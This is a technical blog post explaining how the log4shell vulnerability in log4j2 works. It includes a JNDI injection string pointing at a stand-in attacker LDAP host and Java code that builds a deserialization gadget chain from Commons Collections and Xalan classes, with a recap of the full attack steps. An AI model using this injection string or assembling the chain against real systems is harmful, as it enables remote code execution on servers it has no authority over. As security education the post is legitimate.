log4shell - A nightmare before Christmas

2021-12-12

TL;DR

I presented the following insights with my dear colleague Christian Kumpe at several conferences, so if you prefer to listen and watch a demo rather than read through this huge wall of text and code, you may find a recording in the links section.

Long story short, log4shell CVE-2021-44228

is a critical remote code execution vulnerability in log4j2
abuses JNDI lookups to load attacker-controlled code via LDAP
log4j is just the transport for a deserialization attack
No authentication required, trivial to exploit
One of the most severe supply-chain vulnerabilities ever discovered

Post mortem

So, it’s the beginning of December 2021. Story frequency slows down, the number of bug reports is decreasing and developers all over the world start to relax and focus on the finer things in the software development world.

Until somewhere between the 25th of November and the 9th of December.

One day after CVE-2021-44228 was reported, the problem slowly leaked into the tech channels and log files showed the first suspicious entries. At this point, the mainstream media engaged, the internet exploded and so did our log files.

A typical log entry of a log4shell attack

Enough gossip, let me explain what’s behind all this.

Management summary

For the exploit to work, an attacker needs at least an LDAP server under their control that is reachable from the victim’s Java application. A JNDI lookup statement is then injected into the vulnerable application, and the LDAP server answers with either

a code location - which needs another webserver serving malicious code
or
directly with serialized malicious code - the smarter approach, though it also requires a deserialization attack.

A diagram showing the two possible attack vectors

In this article, I’ll focus on the latter, the details of the deserialization.

The tale of Bobby Tables

The vulnerability’s entry point is log4j’s string substitution. String fragments surrounded by ${...} are evaluated by its StrSubstitutor, which is then able to trigger lookups, e.g. via the JndiLookup.
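
To picture how such a substitution hands control to a lookup, here is a minimal sketch in plain Java. It is not log4j’s StrSubstitutor: the class ToySubstitutor, its lookup registry and the fake jndi handler are assumptions made purely for illustration, and nothing in it touches the network.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.function.Function;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical toy model of "${prefix:key}" substitution, NOT log4j code.
public class ToySubstitutor {

    // Matches ${prefix:key}, e.g. ${jndi:ldap://host/path}
    private static final Pattern LOOKUP = Pattern.compile("\\$\\{([a-z]+):([^}]*)\\}");

    private final Map<String, Function<String, String>> lookups = new LinkedHashMap<>();

    public ToySubstitutor register(String prefix, Function<String, String> lookup) {
        lookups.put(prefix, lookup);
        return this;
    }

    public String replace(String message) {
        Matcher matcher = LOOKUP.matcher(message);
        StringBuffer result = new StringBuffer();
        while (matcher.find()) {
            Function<String, String> lookup = lookups.get(matcher.group(1));
            // Unknown prefixes are left untouched; known ones are handed the key.
            String replacement = (lookup == null)
                    ? matcher.group()
                    : lookup.apply(matcher.group(2));
            matcher.appendReplacement(result, Matcher.quoteReplacement(replacement));
        }
        matcher.appendTail(result);
        return result.toString();
    }

    public static void main(String[] args) {
        ToySubstitutor substitutor = new ToySubstitutor()
                // Stand-in for a JNDI lookup: only reports what it would contact.
                .register("jndi", url -> "<would contact " + url + ">");

        String username = "${jndi:ldap://malicious.ldap.net:1389/evilCode}";
        System.out.println(substitutor.replace("Unable to authenticate user " + username));
    }
}
```

The point of the sketch is that the logging code never asks for a lookup; the user-controlled part of the message decides which handler runs and with which argument.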

Long story short, the attacker needs to place a string like ${jndi:ldap://malicious.ldap.net:1389/evilCode} inside a log statement. And, to be honest, almost everyone has written code allowing this:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class VulnerableLogin {

    private static final Logger logger = LogManager.getLogger(VulnerableLogin.class);
 
    public boolean processLogin(String username, String ...) {
        
        boolean loginSuccessful = false;
        
        // do very secure login things
        
        if(!loginSuccessful) {
            logger.error("Unable to authenticate user " + username);
        }
        
        return loginSuccessful;
    }
}

Remember Bobby Tables?

At this point, log4j executes the lookup and the malicious code is already on the target system. In the next section, I’ll cover how to get this code into the classloader.

Entering the target JVM

To start off, let’s have a quick look at how to get code into the classloader. If you prefer to skip this excursus, you can follow the actual exploit at Understanding JNDI LDAP entries.

The initial test case is quite simple, a Hello World! with a slight difference, a static initializer.

public class Step1_HelloWorld {
	 
    static {
        System.out.println("Static initializer of Step1_HelloWorld");
    }

    public static void main(String[] args) {
        System.out.println("Hello World!");
    }
}

According to JLS 12.4. Initialization of Classes and Interfaces, we can use this initializer as an indicator for successful initialization:

Initialization of a class consists of executing its static initializers and the initializers for static fields (class variables) declared in the class.

Execution will therefore result in the following output:

Output

Static initializer of Step1_HelloWorld
Hello World!

With Class.forName("..."), we’re now able to load the class into the classloader with the same output:

import java.lang.reflect.Method;
	 
public class Step2_ClassForName {
 
    public static void main(String[] args) throws Exception {
        Class<?> helloWorldClass = Class.forName("io.wende...Step1_HelloWorld");
 
        Method mainMethod = helloWorldClass.getMethod("main", String[].class);
        mainMethod.invoke(null, (Object) new String[0]);
    }
}

Output

Static initializer of Step1_HelloWorld
Hello World!
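
Loading a class and initializing it are two separate steps, and only the second one runs the static initializer. The following sketch, with the hypothetical names InitializationDemo and Probe, uses the three-argument Class.forName(name, initialize, loader) to make that difference visible.

```java
import java.util.ArrayList;
import java.util.List;

public class InitializationDemo {

    public static final List<String> EVENTS = new ArrayList<>();

    // Hypothetical probe class; its static initializer records that it ran.
    public static class Probe {
        static {
            EVENTS.add("Static initializer of Probe");
        }
    }

    /** Returns the number of recorded events after loading and after initializing. */
    public static int[] run() {
        try {
            String name = InitializationDemo.class.getName() + "$Probe";
            ClassLoader loader = InitializationDemo.class.getClassLoader();

            Class.forName(name, false, loader); // load only, no initialization
            int afterLoad = EVENTS.size();

            Class.forName(name, true, loader);  // load and initialize
            int afterInit = EVENTS.size();

            return new int[] {afterLoad, afterInit};
        } catch (ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        int[] counts = run();
        System.out.println("Events after loading: " + counts[0]);
        System.out.println("Events after initializing: " + counts[1]);
    }
}
```

A class is initialized at most once per classloader, so calling run() a second time in the same JVM will not add another event.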

This method only works if the class to load is on the classpath, which, unfortunately, is not the case when attacking remote JVMs. Still, it’s possible with the good ol’ overload trick:

import java.io.File;
import java.lang.reflect.Method;
import java.nio.file.Files;

public class Step3_ClassForBytes {
 
    public static void main(String[] args) throws Exception {
        byte[] bytes = Files.readAllBytes(new File("target/classes/.../Step1_HelloWorld.class").toPath());
 
        Class<?> helloWorldClass = new OverloadedClassLoader().defineClass(bytes);
 
        Method mainMethod = helloWorldClass.getMethod("main", String[].class);
        mainMethod.invoke(null, (Object) new String[0]);
    }
 
    private static class OverloadedClassLoader extends ClassLoader {
        Class<?> defineClass(byte[] bytes) {
            return defineClass(null, bytes, 0, bytes.length, null);
        }
    }
}

Since ClassLoader.defineClass(...) is marked protected final, we’re not able to call it directly and cannot override it either; instead, our own ClassLoader subclass exposes it through an overloaded method. Again, our output is the same:

Output

Static initializer of Step1_HelloWorld
Hello World!

Understanding JNDI LDAP entries

As mentioned in the management summary, there are two different ways of delivering code via LDAP: by using a remote code base or by including the serialized code directly. This results in two possible structures:

	Remote code base	Serialized code
Structure	javaClassName `foo`	javaClassName `foo`
	objectClass `javaNamingReference`	javaSerializedData `ac ed 00 05 73 72 00 3a 63 6f 6d 2e 73 75 6e 2e …`
	javaCodeBase `http://127.0.0.1:8080/`	
	javaFactory `io.wende.log4shell.SimplePayload`	
Requirements	LDAP server needs to be reachable from the victim’s machine	Only the LDAP server needs to be reachable from the victim’s machine
	HTTP remote code base needs to be reachable from the victim’s machine	Exploit needs to be triggered at the deserialization of the LDAP payload
	Remote class loading needs to be active (deactivated by default for LDAP since JDK 1.8u191)	
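
The leading bytes `ac ed 00 05 73 72` of javaSerializedData are not specific to the exploit; they are the regular header of a Java serialization stream followed by the markers for "new object" and "class description". A small sketch, with the hypothetical class names StreamHeaderDemo and Sample, prints them for a harmless object:

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;

public class StreamHeaderDemo {

    // Hypothetical, harmless sample object.
    public static class Sample implements Serializable {
        private static final long serialVersionUID = 1L;
        int value = 42;
    }

    public static byte[] serialize(Object object) {
        try (ByteArrayOutputStream bytes = new ByteArrayOutputStream();
             ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(object);
            out.flush(); // make sure buffered data reaches the byte array
            return bytes.toByteArray();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    /** Formats the first 'count' bytes as space-separated lowercase hex. */
    public static String hexPrefix(byte[] data, int count) {
        StringBuilder hex = new StringBuilder();
        for (int i = 0; i < Math.min(count, data.length); i++) {
            if (i > 0) {
                hex.append(' ');
            }
            hex.append(String.format("%02x", data[i] & 0xff));
        }
        return hex.toString();
    }

    public static void main(String[] args) {
        // Stream magic (ac ed), version (00 05), TC_OBJECT (73), TC_CLASSDESC (72)
        System.out.println(hexPrefix(serialize(new Sample()), 6)); // ac ed 00 05 73 72
    }
}
```

The bytes that follow in the table, `63 6f 6d 2e 73 75 6e 2e`, are simply the ASCII characters of a class name starting with "com.sun.".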

Serializing your code

Again, let’s start easy. We’ll create our serializable class with a value to set,

public static class SerializableClass implements Serializable {
    private int value = 0;
}

create an object of this class and serialize it to a file:

SerializableClass serializableObject = new SerializableClass();
serializableObject.value = 42;

try (FileOutputStream file = new FileOutputStream("serialized-data.tmp");
     ObjectOutputStream out = new ObjectOutputStream(file)) {
     out.writeObject(serializableObject);
}

Now, we’re able to read this file and print its value:

try (FileInputStream file = new FileInputStream("serialized-data.tmp");
     ObjectInputStream in = new ObjectInputStream(file)) {

    SerializableClass deserializedObject = (SerializableClass) in.readObject();
    System.out.println("Value of object: " + deserializedObject.value);
}

Output

Value of object: 42

But this approach requires the code responsible for deserialization to explicitly execute our code. This will most likely not happen in real life. The JDK, however, does offer possibilities:

Classes that require special handling during the serialization and deserialization process must implement special methods with these exact signatures:
private void writeObject…

By implementing these methods, we’re now able to execute code directly at serialization and deserialization of the object:

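public static class SerializableClass implements Serializable {
    private int value = 0;

    // Called by ObjectOutputStream instead of the default serialization
    private void writeObject(ObjectOutputStream out) throws IOException {
        System.out.println("Execute on serialization");
        out.defaultWriteObject(); // still write 'value', otherwise it is lost
    }

    // Called by ObjectInputStream instead of the default deserialization
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        System.out.println("Execute on deserialization");
        in.defaultReadObject(); // still restore 'value'
    }
}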

Output

Execute on serialization
Execute on deserialization
Value of object: 42
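
What makes this hook interesting for an attacker is its timing: it runs inside in.readObject(), before the caller gets a chance to inspect the result. The following sketch assumes a victim that expects a String; the class names ReadObjectHookDemo and Hooked are hypothetical, and the byte arrays merely replace the temporary file used above.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.ArrayList;
import java.util.List;

public class ReadObjectHookDemo {

    public static final List<String> EVENTS = new ArrayList<>();

    // Hypothetical class with a deserialization hook.
    public static class Hooked implements Serializable {
        private static final long serialVersionUID = 1L;
        private int value = 42;

        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject(); // restore 'value' first
            EVENTS.add("readObject hook ran, value = " + value);
        }
    }

    public static List<String> run() {
        EVENTS.clear();
        try {
            ByteArrayOutputStream buffer = new ByteArrayOutputStream();
            try (ObjectOutputStream out = new ObjectOutputStream(buffer)) {
                out.writeObject(new Hooked());
            }

            try (ObjectInputStream in = new ObjectInputStream(
                    new ByteArrayInputStream(buffer.toByteArray()))) {
                // The "victim" expects a String; the cast fails only after
                // readObject() has already executed the hook.
                String expected = (String) in.readObject();
                EVENTS.add("caller accepted " + expected);
            } catch (ClassCastException e) {
                EVENTS.add("caller rejected the object");
            }
            return new ArrayList<>(EVENTS);
        } catch (IOException | ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        run().forEach(System.out::println);
    }
}
```

The recorded order shows that rejecting an unexpected type after deserialization comes too late; the hook has already been executed by then.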

A possible attack vector emerges

In the previous sections, I went through the several steps of delivering malicious code to the victim’s application, and it looks like there is a possibility to succeed. Though, as you may have noticed, there are still some problems to solve. Time for a recap:

Steps of a successful attack	Possible approach	Problem
Initial entry-point to the vulnerable application	Injecting arbitrary data via log4j’s JNDI lookup	✔️ None, working as designed
Deliver malicious code to target	Utilize LDAP’s HTTP remote code location	⚠️ Additional infrastructure resource needed
	Deliver serialized code in LDAP entry	✔️ None, avoids additional weak link in attack chain
Remote code execution on target	On deserialization	❌ Code is not in classpath
		❌ Execute arbitrary method upon deserialization

The last issue we now need to tackle is finding a suitable deserialization attack. As detailed in the last section, a class’s private void readObject(ObjectInputStream in) is called whenever one of its objects is deserialized, so let’s have a look at the common objects; perhaps we’ll find a flaw to exploit.

A collection, vantage point for success

When taking a look at the source of java.util.HashMap, it looks like it does not serialize its internal data structure, but directly its keys and values. Upon deserialization, this process is reversed; keys and values are deserialized and put back into the map’s structure:

java.util.HashMap, shortened for readability

public class HashMap<K,V> extends AbstractMap<K,V> implements Map<K,V>, Cloneable, Serializable {
    
    private void readObject(java.io.ObjectInputStream s) throws IOException, ClassNotFoundException {
            for (int i = 0; i < mappings; i++) {
                K key = (K) s.readObject();
                V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }
    }

    static final int hash(Object key) {
        int h;
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
    }
}

As the name HashMap already tells us, these maps rely on the hash codes of their entries’ keys. Upon reassembly, the hash code needs to be computed again; see the call to hash(key) in readObject(...) and the call to key.hashCode() in hash(...). This is an important observation we’ll need later:

A HashMap calls the .hashCode() method of its entries’ keys on deserialization.
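
This observation can be checked with the JDK alone. The sketch below uses a hypothetical key class NoisyKey that counts calls to its hashCode(); the counter is reset after the map has been built, so everything counted afterwards happens during deserialization.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.atomic.AtomicInteger;

public class HashCodeOnDeserialization {

    public static final AtomicInteger HASH_CODE_CALLS = new AtomicInteger();

    // Hypothetical key that counts how often its hashCode() is called.
    public static class NoisyKey implements Serializable {
        private static final long serialVersionUID = 1L;
        private final String name;

        public NoisyKey(String name) {
            this.name = name;
        }

        @Override
        public int hashCode() {
            HASH_CODE_CALLS.incrementAndGet();
            return name.hashCode();
        }

        @Override
        public boolean equals(Object other) {
            return other instanceof NoisyKey && ((NoisyKey) other).name.equals(name);
        }
    }

    public static int callsDuringDeserialization() {
        try {
            Map<NoisyKey, String> map = new HashMap<>();
            map.put(new NoisyKey("key"), "a value"); // put() calls hashCode() as well

            ByteArrayOutputStream buffer = new ByteArrayOutputStream();
            try (ObjectOutputStream out = new ObjectOutputStream(buffer)) {
                out.writeObject(map);
            }

            HASH_CODE_CALLS.set(0); // only count what happens from here on
            try (ObjectInputStream in = new ObjectInputStream(
                    new ByteArrayInputStream(buffer.toByteArray()))) {
                in.readObject(); // nobody touches the map or its key afterwards
            }
            return HASH_CODE_CALLS.get();
        } catch (IOException | ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println("hashCode() calls during deserialization: "
                + callsDuringDeserialization());
    }
}
```

The count is greater than zero although the calling code only invoked readObject() and never used the map.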

Execute methods on deserialization

Step by step, we’ll now try to execute an arbitrary method upon deserialization, at first with the payload in our classpath. Again, we start with this sample class:

public static class SerializableClass implements Serializable {
    public void myMethod() {
        System.out.println("Executed myMethod");
    }
}

To trigger the actual method execution, we’ll use a combination of three features of Apache Commons Collections:

TiedMapEntry
Basically a Map.Entry that ties an arbitrary key object to a backing Map, from which its value is looked up; here we’ll use our payload object as the key
LazyMap
A map that is able to ‘generate’ map entries on demand
InvokerTransformer
A helper that executes the passed method on the passed object, enabling the LazyMap to generate map entries

SerializableClass serializableObject = new SerializableClass();

// Executes the passed method on calling .transform()
InvokerTransformer invokerTransformer = new InvokerTransformer("myMethod", new Class[0], new Object[0]);

// Calls the InvokerTransformer to generate map entries lazily
LazyMap lazyMap = LazyMap.lazyMap(new HashMap(), invokerTransformer);
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, serializableObject);

Now, we’ll create a simple HashMap with one entry and replace this entry’s key with our prepared TiedMapEntry:

Map hashMap = new HashMap();
hashMap.put("this key will be replaced by tiedMapEntry", "a value");

// replace key by reflection
Object firstMapEntry = hashMap.entrySet().iterator().next();
ReflectionUtil.setFieldValue(firstMapEntry, "key", tiedMapEntry);

The idea behind this is: as we remember, upon deserialization, the .hashCode() method of the map’s key is called. This key is now the TiedMapEntry, whose hashCode() asks the LazyMap for the value belonging to our payload object. The LazyMap does not have this entry yet and calls InvokerTransformer.transform() to generate it, which eventually calls our payload’s method. The initial replacement of the map key probably breaks the map’s structure, but we don’t care about this, as long as our code is executed.
Quite smart, isn’t it? Yes, but still, this only works with classpath code.
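
For readers without Commons Collections at hand, the call chain can be reproduced with the JDK alone. The classes MiniInvoker, MiniLazyMap and MiniTiedEntry below are hypothetical, heavily simplified stand-ins written for this sketch, not the library’s code. Instead of replacing the key by reflection, the sketch simply lets put() trigger the payload once and then resets the state before serializing.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

public class GadgetChainSketch {

    public static final List<String> EVENTS = new ArrayList<>();

    /** The payload; nothing in it hooks into deserialization. */
    public static class Payload implements Serializable {
        public void myMethod() {
            EVENTS.add("Executed myMethod");
        }
    }

    /** Stand-in for InvokerTransformer: calls a no-arg method by name. */
    public static class MiniInvoker implements Serializable {
        private final String methodName;
        public MiniInvoker(String methodName) { this.methodName = methodName; }

        public Object transform(Object target) {
            try {
                Method method = target.getClass().getMethod(methodName);
                return method.invoke(target);
            } catch (ReflectiveOperationException e) {
                throw new IllegalStateException(e);
            }
        }
    }

    /** Stand-in for LazyMap: generates missing values via the invoker. */
    public static class MiniLazyMap implements Serializable {
        private final Map<Object, Object> entries = new HashMap<>();
        private final MiniInvoker factory;
        public MiniLazyMap(MiniInvoker factory) { this.factory = factory; }

        public Object get(Object key) {
            if (!entries.containsKey(key)) {
                entries.put(key, factory.transform(key));
            }
            return entries.get(key);
        }
        public void clear() { entries.clear(); }
    }

    /** Stand-in for TiedMapEntry: hashCode() looks up the value in the map. */
    public static class MiniTiedEntry implements Serializable {
        private final MiniLazyMap map;
        private final Object key;
        public MiniTiedEntry(MiniLazyMap map, Object key) { this.map = map; this.key = key; }

        @Override
        public int hashCode() {
            Object value = map.get(key);
            return (value == null) ? 0 : value.hashCode();
        }
    }

    public static List<String> run() {
        try {
            MiniLazyMap lazyMap = new MiniLazyMap(new MiniInvoker("myMethod"));
            Map<Object, Object> hashMap = new HashMap<>();
            // put() calls hashCode() and therefore runs the payload once ...
            hashMap.put(new MiniTiedEntry(lazyMap, new Payload()), "a value");
            // ... so drop the generated entry and the recorded event again.
            lazyMap.clear();
            EVENTS.clear();

            ByteArrayOutputStream buffer = new ByteArrayOutputStream();
            try (ObjectOutputStream out = new ObjectOutputStream(buffer)) {
                out.writeObject(hashMap);
            }
            try (ObjectInputStream in = new ObjectInputStream(
                    new ByteArrayInputStream(buffer.toByteArray()))) {
                in.readObject(); // the caller never touches Payload
            }
            return new ArrayList<>(EVENTS);
        } catch (IOException | ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(run());
    }
}
```

Clearing the lazy map before serialization matters: if the generated entry were serialized along, the lookup during deserialization would find it and the invoker would not be called again.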

Instantiating a class from serialized data

Again, we’ll need to utilize classes or a library likely to be present in the target application. Apache Xalan is our candidate; it heavily uses instantiation of bytecode to generate classes for its XSLT transformations. Key players here are the TemplatesImpl and an implementation of the AbstractTranslet.

As shown at the beginning of our journey, the static initializer of a class is executed upon initialization; we’ll use this in our own implementation of Xalan’s AbstractTranslet:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class TransletPayload extends AbstractTranslet {

    static {
        System.out.println("Payload in static initializer of TransletPayload");
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) {}

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {}
}

The bytecode of this translet can now be packed into Xalan’s TemplatesImpl and submitted for serialization. On deserialization, we can now trigger our code with TemplatesImpl.newTransformer(). This will throw an exception, but, by setting the field value _name, it will be thrown after initialization of the translet.

byte[] classBytes = Files.readAllBytes(new File("io/wende/log4shell/TransletPayload.class").toPath());

TemplatesImpl templates = new TemplatesImpl();
ReflectionUtil.setFieldValue(templates, "_name", "");
ReflectionUtil.setFieldValue(templates, "_bytecodes", new byte[][]{classBytes});

try (FileOutputStream file = new FileOutputStream("serialized-data.tmp"); ObjectOutputStream out = new ObjectOutputStream(file)) {
    out.writeObject(templates);
}

try (FileInputStream file = new FileInputStream("serialized-data.tmp"); ObjectInputStream in = new ObjectInputStream(file)) {
    TemplatesImpl deserializedTemplates = (TemplatesImpl) in.readObject();
    deserializedTemplates.newTransformer();
}

Output

Payload in static initializer of TransletPayload
Exception in thread "main" java.lang.NullPointerException
at …

The last remaining issue is now the explicit call to TemplatesImpl.newTransformer() right after deserialization. To show the least bit of responsibility, I’ll leave it to you - the reader - to solve this with the insights of the previous section.

Funeral feast

Wow, what a journey. Again, time for a recap: what did we need to do to inject and execute our code on the target system?

Place the payload in the static initializer of an AbstractTranslet
Pack the bytecode of the translet in a TemplatesImpl
Create an InvokerTransformer calling TemplatesImpl.newTransformer()
Add the InvokerTransformer to a LazyMap
Create a TiedMapEntry with the LazyMap as backing map and the TemplatesImpl as key
Craft a basic HashMap with one entry and manually replace the entry’s key with the TiedMapEntry
Serialize this map and deliver it in an LDAP response entry
Inject an LDAP JNDI lookup into a vulnerable Java application

Knowing this, I think it’s a pity that mainly log4j was blamed for being the security risk. Yes, it opens the door, but the real breach is the clever combination of common library classes, which allows initializing external code that is not on the JVM’s classpath.

Limitations

As with any other exploit, there are some limitations and preconditions that have to be met. In this particular example, it’s Apache Log4j2 in a version <= 2.14.1 and, for the remote code base variant, the target’s JDK in an update version < 1.8u191. The same goes for the common library touchpoints like Apache Commons Collections and Apache Xalan, which have to be present on the target in a vulnerable version.
Please also note, the approach shown in this post is just one possible way of combining code injection and execution. Especially the deserialization attack detailed in the last few sections is just one flavor, using the most common utility libraries. The approach was constantly improved, changed to other vulnerable libraries and distribution channels (e.g. replaced LDAP with DNS probes or JBoss requests) and I assume this has not been the last attack of this kind.
Anyway, I admire the cleverness and the persistence needed to create such ingenious constructs.

Links

This blog post is the written summary of a talk I prepared and held together with Christian Kumpe, Die Technik hinter Log4Shell & Co. (The technology behind Log4Shell & Co.). Up to now, it has been featured at the following conferences: